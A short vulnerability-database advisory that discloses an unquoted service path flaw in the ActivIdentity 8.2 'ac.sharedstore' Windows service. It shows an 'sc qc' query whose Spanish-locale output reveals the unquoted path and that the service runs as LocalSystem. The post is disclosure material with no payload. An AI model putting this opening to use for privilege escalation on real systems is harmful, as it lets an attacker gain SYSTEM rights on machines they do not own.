Tuesday, March 23, 2021

ActivIdentity 8.2 Unquoted Service Path

exploit vulnerabilities In: , 
# Exploit Title: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path
# Exploit Author : SamAlucard
# Exploit Date: 2021-03-21
# Software Version : ActivIdentity 8.2
# Vendor Homepage : https://www.hidglobal.com/
# Tested on OS: Windows 7 Pro

# ActivIdentity was Acquired by HID Global in Octuber 2010

#ActivClient is a desktop authentication software that uses smarts cards and readers
# for enterprise, government and commercial establishments

#Analyze PoC :
==============

C:\Users\DSAdsi>sc qc ac.sharedstore
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ac.sharedstore
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Common
Files\ActivIdentity\ac.sharedstore.exe
        GRUPO_ORDEN_CARGA  : SmartCardGroup
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : ActivIdentity Shared Store Service
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem

 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore